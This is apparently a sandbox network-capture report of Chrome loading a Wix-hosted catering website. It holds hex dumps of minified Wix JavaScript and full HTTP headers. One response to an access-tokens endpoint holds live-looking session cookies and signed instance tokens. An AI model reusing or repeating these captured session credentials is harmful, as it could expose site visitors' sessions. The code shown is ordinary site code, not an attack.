                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC225INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 30 31 37 2c 38 37 39 32 5d 2c 7b 34 37 37 39 35 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 41 63 63 65 73 73 6f 72 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 6e 2c 6f 3d 7b 70 6f 6c 69 63 79 3a 22 67 65 74 43 75 72 72 65 6e 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 22 2c 68 65 61 64 65 72 3a
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4017,8792],{47795:(e,t,r)=>{"use strict";r.r(t),r.d(t,{ConsentPolicyAccessor:()=>f});var n,o={policy:"getCurrentConsentPolicy",header:
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 22 5f 67 65 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 48 65 61 64 65 72 22 2c 69 73 4d 65 74 68 6f 64 3a 21 30 7d 2c 69 3d 7b 70 6f 6c 69 63 79 3a 22 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 22 2c 68 65 61 64 65 72 3a 22 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 48 65 61 64 65 72 22 2c 69 73 4d 65 74 68 6f 64 3a 21 31 7d 2c 61 3d 7b 65 73 73 65 6e 74 69 61 6c 3a 21 30 2c 64 61 74 61 54 6f 54 68 69 72 64 50 61 72 74 79 3a 21 30 2c 61 64 76 65 72 74 69 73 69 6e 67 3a 21 30 2c 66 75 6e 63 74 69 6f 6e 61 6c 3a 21 30 2c 61 6e 61 6c 79 74 69 63 73 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 73 65 6c 66 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75
                                                                                                                                                                                                                        Data Ascii: "_getConsentPolicyHeader",isMethod:!0},i={policy:"consentPolicy",header:"consentPolicyHeader",isMethod:!1},a={essential:!0,dataToThirdParty:!0,advertising:!0,functional:!0,analytics:!0};function s(){return window}function c(){return self}function u(){retu
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 72 65 6e 63 65 28 29 2c 65 2e 70 6f 6c 69 63 79 3f 65 2e 70 6f 6c 69 63 79 3a 65 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 48 65 61 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 21 31 29 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 41 63 63 65 73 73 7c 7c 28 74 68 69 73 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 41 63 63 65 73 73 3d 64 28 74 68 69 73 2e 65 6e 76 29 29 3b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 41 63 63 65 73 73 26 26 74 68 69 73 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 41 63 63 65 73 73 2e 5f 67 65 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 48 65 61 64 65 72 28 29 7c 7c 7b 22 63 6f 6e 73 65 6e 74 2d 70
                                                                                                                                                                                                                        Data Ascii: rence(),e.policy?e.policy:e},e.prototype.getConsentPolicyHeader=function(e){void 0===e&&(e=!1),this.consentPolicyAccess||(this.consentPolicyAccess=d(this.env));var t=this.consentPolicyAccess&&this.consentPolicyAccess._getConsentPolicyHeader()||{"consent-p
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 70 70 4c 6f 61 64 53 74 61 72 74 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 31 7d 2c 22 61 70 70 4c 6f 61 64 46 69 6e 69 73 68 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 33 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 72 74 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 34 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 45 6e 64 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 35 7d 2c 22 6c 6f 61 64 50 68 61 73 65 53 74 61 72 74 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 38 7d 2c 22 6c 6f 61 64 50 68 61 73 65 46 69 6e 69 73 68 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 32 7d 2c 22 65 72 72 6f 72 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 36 7d 2c 22 72 65 73 6f 75 72 63 65 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 34 37 7d 7d 27 29 2c 61 3d 4a 53 4f 4e 2e 70 61 72 73 65 28
                                                                                                                                                                                                                        Data Ascii: ppLoadStart":{"eventId":41},"appLoadFinish":{"eventId":43},"interactionStart":{"eventId":44},"interactionEnd":{"eventId":45},"loadPhaseStart":{"eventId":48},"loadPhaseFinish":{"eventId":42},"error":{"eventId":46},"resource":{"eventId":47}}'),a=JSON.parse(
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 3a 35 35 7d 2c 22 6c 6f 61 64 50 68 61 73 65 53 74 61 72 74 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 35 38 7d 2c 22 6c 6f 61 64 50 68 61 73 65 46 69 6e 69 73 68 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 35 32 7d 2c 22 65 72 72 6f 72 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 35 36 7d 2c 22 72 65 73 6f 75 72 63 65 22 3a 7b 22 65 76 65 6e 74 49 64 22 3a 35 37 7d 7d 27 29 3b 76 61 72 20 75 3d 7b 44 45 46 41 55 4c 54 3a 22 44 45 46 41 55 4c 54 22 2c 44 53 3a 22 44 53 22 2c 45 44 49 54 4f 52 3a 22 45 44 49 54 4f 52 22 2c 4f 4f 49 3a 22 4f 4f 49 22 2c 42 4f 4c 54 3a 22 42 4f 4c 54 22 2c 4d 4f 42 49 4c 45 3a 22 4d 4f 42 49 4c 45 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 20 75 2e 44 45 46 41 55 4c 54 3a 72 65 74 75 72 6e
                                                                                                                                                                                                                        Data Ascii: :55},"loadPhaseStart":{"eventId":58},"loadPhaseFinish":{"eventId":52},"error":{"eventId":56},"resource":{"eventId":57}}');var u={DEFAULT:"DEFAULT",DS:"DS",EDITOR:"EDITOR",OOI:"OOI",BOLT:"BOLT",MOBILE:"MOBILE"};function l(e){switch(e){case u.DEFAULT:return
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 7c 63 29 28 29 3b 69 66 28 6e 5b 36 5d 3d 31 35 26 6e 5b 36 5d 7c 36 34 2c 6e 5b 38 5d 3d 36 33 26 6e 5b 38 5d 7c 31 32 38 2c 74 29 7b 72 3d 72 7c 7c 30 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 31 36 3b 2b 2b 65 29 74 5b 72 2b 65 5d 3d 6e 5b 65 5d 3b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 6c 28 6e 29 7d 3b 63 6c 61 73 73 20 70 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 74 72 61 6e 73 61 63 74 69 6f 6e 53 74 61 72 74 54 69 6d 65 73 3d 7b 7d 2c 74 68 69 73 2e 70 68 61 73 65 53 74 61 72 74 54 69 6d 65 73 3d 7b 7d 7d 63 72 65 61 74 65 4b 65 79 28 2e 2e 2e 65 29 7b 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 20 7c 20 22 29 7d 6d 61 72 6b 54 72 61 6e 73 61 63 74 69 6f 6e 53 74 61 72 74 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e
                                                                                                                                                                                                                        Data Ascii: |c)();if(n[6]=15&n[6]|64,n[8]=63&n[8]|128,t){r=r||0;for(let e=0;e<16;++e)t[r+e]=n[e];return t}return l(n)};class p{constructor(){this.transactionStartTimes={},this.phaseStartTimes={}}createKey(...e){return e.join(" | ")}markTransactionStart(e,t,r){const n
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 3d 66 28 29 7d 7d 63 6f 6e 73 74 20 6d 3d 28 29 3d 3e 6e 65 77 20 68 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 72 3d 30 3b 72 3c 65 3b 72 2b 2b 29 74 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 3f 3f 7b 7d 29 2e 72 65 64 75 63 65 28 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 5b 72 2c 6e 5d 3d 74 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 5b 72 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 28 65 5b 72 5d 3d 6e 29 2c 65 7d 29 2c 65 29 29 2c 7b 7d 29 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72
                                                                                                                                                                                                                        Data Ascii: =f()}}const m=()=>new h,g=function(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];return t.reduce(((e,t)=>Object.entries(t??{}).reduce(((e,t)=>{let[r,n]=t;return void 0===e[r]&&void 0!==n&&(e[r]=n),e}),e)),{})},y=function(e){for
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 2e 6e 61 6d 65 2c 65 29 7d 66 69 6e 69 73 68 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 62 61 73 65 43 6c 69 65 6e 74 2e 72 65 70 6f 72 74 54 72 61 6e 73 61 63 74 69 6f 6e 46 69 6e 69 73 68 28 74 68 69 73 2e 6e 61 6d 65 2c 65 29 7d 7d 63 6c 61 73 73 20 5f 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 7b 62 61 73 65 43 6c 69 65 6e 74 3a 74 7d 3d 65 3b 28 30 2c 6e 2e 41 29 28 74 68 69 73 2c 22 62 61 73 65 43 6c 69 65 6e 74 22 2c 76 6f 69 64 20 30 29 2c 74 68 69 73 2e 62 61 73 65 43 6c 69 65 6e 74 3d 74 2c 6f 28 74 68 69 73 29 7d 74 72 61 6e 73 61 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 53 28 65 2c 74 68 69 73 2e 62 61 73 65 43 6c 69 65 6e 74 29 7d 65 72 72 6f 72 4d 6f 6e 69 74 6f 72 28 65 29 7b 72 65 74 75 72 6e 20 6e 65
                                                                                                                                                                                                                        Data Ascii: .name,e)}finish(e){return this.baseClient.reportTransactionFinish(this.name,e)}}class _{constructor(e){let{baseClient:t}=e;(0,n.A)(this,"baseClient",void 0),this.baseClient=t,o(this)}transaction(e){return new S(e,this.baseClient)}errorMonitor(e){return ne
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 70 75 73 68 28 74 29 7d 69 6e 76 6f 6b 65 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 73 75 62 73 63 72 69 62 65 72 73 5b 65 5d 3b 69 66 28 21 74 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 3d 6e 65 77 20 41 72 72 61 79 28 72 3e 31 3f 72 2d 31 3a 30 29 2c 6f 3d 31 3b 6f 3c 72 3b 6f 2b 2b 29 6e 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 29 69 66 28 21 31 3d 3d 3d 65 28 2e 2e 2e 6e 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 7d 63 6c 61 73 73 20 45 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 68 69 73 2e 6e 61 6d 65 3d 65 2c 74 68 69 73 2e 62 61 73 65 43 6c 69 65 6e 74 3d 74 2c 74 68 69 73 2e
                                                                                                                                                                                                                        Data Ascii: push(t)}invoke(e){const t=this.subscribers[e];if(!t)return!0;for(var r=arguments.length,n=new Array(r>1?r-1:0),o=1;o<r;o++)n[o-1]=arguments[o];for(const e of t)if(!1===e(...n))return!1;return!0}}class E{constructor(e,t){this.name=e,this.baseClient=t,this.
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 69 73 57 69 78 48 74 74 70 45 72 72 6f 72 3a 21 31 2c 72 65 71 75 65 73 74 49 64 3a 22 22 7d 29 2c 78 3d 65 3d 3e 28 7b 73 65 73 73 69 6f 6e 49 64 3a 65 2e 67 65 74 53 65 73 73 69 6f 6e 49 64 28 29 2c 73 65 73 73 69 6f 6e 54 69 6d 65 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 65 2e 67 65 74 53 65 73 73 69 6f 6e 54 69 6d 65 28 29 29 7d 29 2c 43 3d 28 65 2c 74 2c 72 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 7b 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 6f 2c 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 3a 69 7d 3d 72 2c 7b 73 65 73 73 69 6f 6e 49 64 3a 61 2c 73 65 73 73 69 6f 6e 54 69 6d 65 3a 73 7d 3d 78 28 65 29 2c 63 3d 76 2e 24 62 2e 49 6e 66 6f 2c 75 3d 60 50 61 6e 6f 72 61 6d 61 20 24 7b 6f 7d 20 24 7b 69 7d 60 3b 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 2e 2e
                                                                                                                                                                                                                        Data Ascii: isWixHttpError:!1,requestId:""}),x=e=>({sessionId:e.getSessionId(),sessionTime:Math.round(e.getSessionTime())}),C=(e,t,r,n)=>{const{transactionName:o,transactionAction:i}=r,{sessionId:a,sessionTime:s}=x(e),c=v.$b.Info,u=`Panorama ${o} ${i}`;return{...t,..


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        12192.168.2.54973134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC595OUTGET /services/wix-thunderbolt/dist/main.renderer.a20626f8.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1148INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: gjZ_vS_5aj06HA8.Rgqos_hL3hvOm7Bb
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 940520359 858844017
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 231225477 211910547
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Sun, 05 Jan 2025 06:35:58 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 458199
                                                                                                                                                                                                                        Last-Modified: Sun, 05 Jan 2025 06:22:43 GMT
                                                                                                                                                                                                                        ETag: "17dc6142a5674dc31c4e4ac8ab3502fc"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC152INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 36 37 5d 2c 7b 36 35 38 39 3a 28 29 3d 3e 7b 7d 7d 2c 70 3d 3e 7b 76 61 72 20 73 3b 73 3d 36 35 38 39 2c 70 28 70 2e 73 3d 73 29 7d 5d 29 3b
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[867],{6589:()=>{}},p=>{var s;s=6589,p(p.s=s)}]);


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        13192.168.2.54973234.149.87.454435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC801OUTGET /_api/v1/access-tokens HTTP/1.1
                                                                                                                                                                                                                        Host: www.samantacatering.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Cookie: ssr-caching=cache#desc=hit#varnish=hit_miss#dc#desc=fastly_virginia-pub_g; XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1575INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 13300
                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=86400
                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 9
                                                                                                                                                                                                                        Age: 15877
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517157.11310934127652945141
                                                                                                                                                                                                                        Set-Cookie: hs=441353572; Path=/; Domain=www.samantacatering.com; Secure; HTTPOnly
                                                                                                                                                                                                                        Set-Cookie: svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; Max-Age=63071999; Expires=Sun, 10 Jan 2027 13:52:36 GMT; Path=/; Domain=www.samantacatering.com; Secure; HTTPOnly; SameSite=None
                                                                                                                                                                                                                        Cache-Control: private,no-cache,no-store
                                                                                                                                                                                                                        Server: Pepyaka
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:37 GMT
                                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200115-IAD
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_virginia-pub_g
                                                                                                                                                                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLmyj60grFblwe6GMGwLh6UYtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRalp0mfgfrNn0xFl5u/6TSGE0euij1AohZhml+oS2a6xOYaMclmZUrgYaALnu1tVXw0ViB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47EHaMG9J8M6uqdkXcNn1Z84xwy5Yb789UDkEfaJNWrtQ
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1575INData Raw: 7b 22 68 73 22 3a 34 34 31 33 35 33 35 37 32 2c 22 76 69 73 69 74 6f 72 49 64 22 3a 22 38 64 36 34 39 33 33 37 2d 38 39 63 64 2d 34 38 64 34 2d 39 39 33 39 2d 31 37 64 31 65 30 38 32 39 38 38 34 22 2c 22 73 76 53 65 73 73 69 6f 6e 22 3a 22 32 61 39 33 30 65 36 39 63 39 34 63 65 39 32 65 37 34 37 33 66 62 37 35 38 38 62 31 62 38 36 31 39 65 63 39 34 61 65 34 34 37 32 30 37 62 31 61 37 36 39 33 36 39 62 64 35 64 33 62 30 62 34 33 34 33 31 66 36 31 64 64 62 64 30 30 65 33 62 65 34 32 64 36 36 62 61 65 32 62 38 61 35 38 32 65 31 65 36 30 39 39 34 64 35 33 39 36 34 65 36 34 37 61 63 66 34 33 31 65 34 66 37 39 38 62 63 64 34 33 30 34 61 34 64 34 64 35 30 39 30 34 32 61 64 35 38 32 64 33 37 35 30 37 35 61 38 38 34 33 39 30 33 39 36 62 33 31 65 66 65 62 36 34 61
                                                                                                                                                                                                                        Data Ascii: {"hs":441353572,"visitorId":"8d649337-89cd-48d4-9939-17d1e0829884","svSession":"2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1575INData Raw: 43 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63 74 4e 44 5a 69 4e 79 31 68 5a 57 5a 6d 4c 54 64 69 5a 54 4d 7a 4e 6a 55 79 4d 6a 64 6b 4f 53 4a 39 22 2c 22 69 6e 74 49 64 22 3a 31 34 7d 2c 22 31 34 31 66 62 66 61 65 2d 35 31 31 65 2d 36 38 31 37 2d 63 39 66 30 2d 34 38 39 39 33 61 37 35 34 37 64 31 22 3a 7b 22 69 6e 73 74 61 6e 63 65 22 3a 22 2d 4e 41 6f 4c 48 61 4a 36 6e 4a 70 64 31 5f 5f 67 71 56 6f 47 67 4e 58 37 5a 46 44 54 43 48 54 4e 4f 57 4c 74 76 6e 76 42 78 73 2e 65 79 4a 70 62 6e 4e 30 59 57 35 6a 5a 55 6c 6b 49 6a 6f 69 4d 32 49 78 59 6d 4d 78 59 6a 45 74 4e 32 52 6c 59 79 30 30 4e 32 55 32 4c 54 67 33 59 54 6b 74 4e 6a 49 33 4e 6a 45 34 59 54 55 34 4d 54 56 6b 49 69 77 69 59 58 42 77 52 47 56 6d 53 57 51 69 4f 69 49 78 4e 44
                                                                                                                                                                                                                        Data Ascii: CI6IjAxNThiNGM2LTNiNTctNDZiNy1hZWZmLTdiZTMzNjUyMjdkOSJ9","intId":14},"141fbfae-511e-6817-c9f0-48993a7547d1":{"instance":"-NAoLHaJ6nJpd1__gqVoGgNX7ZFDTCHTNOWLtvnvBxs.eyJpbnN0YW5jZUlkIjoiM2IxYmMxYjEtN2RlYy00N2U2LTg3YTktNjI3NjE4YTU4MTVkIiwiYXBwRGVmSWQiOiIxND
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1575INData Raw: 45 7a 4f 6a 55 79 4f 6a 4d 33 4c 6a 45 79 4d 31 6f 69 4c 43 4a 6b 5a 57 31 76 54 57 39 6b 5a 53 49 36 5a 6d 46 73 63 32 55 73 49 6d 46 70 5a 43 49 36 49 6a 68 6b 4e 6a 51 35 4d 7a 4d 33 4c 54 67 35 59 32 51 74 4e 44 68 6b 4e 43 30 35 4f 54 4d 35 4c 54 45 33 5a 44 46 6c 4d 44 67 79 4f 54 67 34 4e 43 49 73 49 6d 4a 70 56 47 39 72 5a 57 34 69 4f 69 4a 69 4d 44 55 77 59 7a 4a 6d 4d 79 30 31 4e 6a 59 32 4c 54 41 7a 4e 6a 49 74 4d 7a 45 35 4e 79 30 77 4e 6a 4d 79 59 54 56 6d 59 6d 59 30 4e 47 55 69 4c 43 4a 7a 61 58 52 6c 54 33 64 75 5a 58 4a 4a 5a 43 49 36 49 6a 41 78 4e 54 68 69 4e 47 4d 32 4c 54 4e 69 4e 54 63 74 4e 44 5a 69 4e 79 31 68 5a 57 5a 6d 4c 54 64 69 5a 54 4d 7a 4e 6a 55 79 4d 6a 64 6b 4f 53 4a 39 22 2c 22 69 6e 74 49 64 22 3a 31 39 7d 2c 22 33 30
                                                                                                                                                                                                                        Data Ascii: EzOjUyOjM3LjEyM1oiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsImJpVG9rZW4iOiJiMDUwYzJmMy01NjY2LTAzNjItMzE5Ny0wNjMyYTVmYmY0NGUiLCJzaXRlT3duZXJJZCI6IjAxNThiNGM2LTNiNTctNDZiNy1hZWZmLTdiZTMzNjUyMjdkOSJ9","intId":19},"30
